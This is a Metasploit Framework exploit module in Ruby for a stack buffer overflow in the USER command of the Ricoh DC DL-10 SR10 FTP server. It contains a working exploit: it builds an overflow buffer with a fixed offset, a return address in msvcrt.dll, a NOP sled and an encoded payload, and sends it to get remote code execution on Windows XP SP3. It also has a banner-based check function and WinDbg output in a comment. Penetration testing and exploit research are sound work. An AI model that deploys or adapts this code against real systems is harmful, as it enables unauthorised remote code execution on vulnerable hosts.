## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp def initialize(info={}) super(update_info(info, 'Name' => "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP service. By supplying a long string of data to the USER command, it is possible to trigger a stack-based buffer overflow, which allows remote code execution under the context of the user. Please note that in order to trigger the vulnerability, the server must be configured with a log file name (by default, it's disabled). }, 'License' => MSF_LICENSE, 'Author' => [ 'Julien Ahrens', #Discovery, PoC 'sinn3r' #Metasploit ], 'References' => [ ['OSVDB', '79691'], ['URL', 'http://secunia.com/advisories/47912'], ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/'] ], 'Payload' => { # Yup, no badchars 'BadChars' => "\x00", }, 'DefaultOptions' => { 'ExitFunction' => "process", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3', { 'Ret' => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll) 'Offset' => 245 } ] ], 'Privileged' => false, 'DisclosureDate' => "Mar 1 2012", 'DefaultTarget' => 0)) # We're triggering the bug via the USER command, no point to have user/pass # as configurable options. deregister_options('FTPPASS', 'FTPUSER') end def check connect disconnect if banner =~ /220 DSC ftpd 1\.0 FTP Server/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit buf = '' buf << rand_text_alpha(target['Offset'], payload_badchars) buf << [target.ret].pack('V') buf << make_nops(20) buf << payload.encoded print_status("#{rhost}:#{rport} - Sending #{self.name}") connect send_user(buf) handler disconnect end end =begin 0:002> lmv m SR10 start end module name 00400000 00410000 SR10 (deferred) Image path: C:\Program Files\DC Software\SR10.exe Image name: SR10.exe Timestamp: Mon May 19 23:55:32 2008 (483275E4) CheckSum: 00000000 ImageSize: 00010000 File version: 1.0.0.520 Product version: 1.0.0.0 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type: 1.0 App File date: 00000000.00000000 Translations: 0409.04b0 CompanyName: Ricoh Co.,Ltd. ProductName: SR-10 InternalName: SR-10 OriginalFilename: SR10.EXE ProductVersion: 1, 0, 0, 0 FileVersion: 1, 0, 0, 520 PrivateBuild: 1, 0, 0, 520 SpecialBuild: 1, 0, 0, 520 FileDescription: SR-10 Note: No other DC Software dlls are loaded when SR-10.exe is running, so the most stable component we can use is msvcrt.dll for now. =end